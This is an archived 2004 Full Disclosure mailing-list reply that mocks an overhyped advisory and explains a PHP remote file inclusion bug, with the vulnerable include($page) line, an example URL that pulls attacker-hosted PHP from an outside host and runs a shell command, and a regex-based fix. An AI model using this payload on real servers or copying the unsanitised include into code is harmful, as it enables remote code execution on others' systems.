Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: <m.esco () wp pl>
Date: Sat, 3 Jul 2004 10:19:19 +0200

Is this cool or not, I can't tell.:P

Example:

www.fuck-teso.com/index.php?page=whitehats.php

index.php:
...
include($page); // <--- fucking lame
...

So, you don't know, but there is a BIGBUG.

No, it is a f*****g lame programmer bug :)

You can include a remote page, that contains
php code, that will be executed on the fuck-teso server:

www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd=
ls%20/tmp

On most of php servers configuration directive allow_url_fopen
(http://php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen) is set to
off, so you cannot parse remote script to that server. Sometimes it is not,
and there is some possibility of doing the above, of course, only when some
coder have not done his job properly.

Solution to "the problem":
Use your brain while coding, and test your code.

Quick and usefull solution:

include(preg_replace("|[^\w\.]|", "", $page));


Best regards
m.esco



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault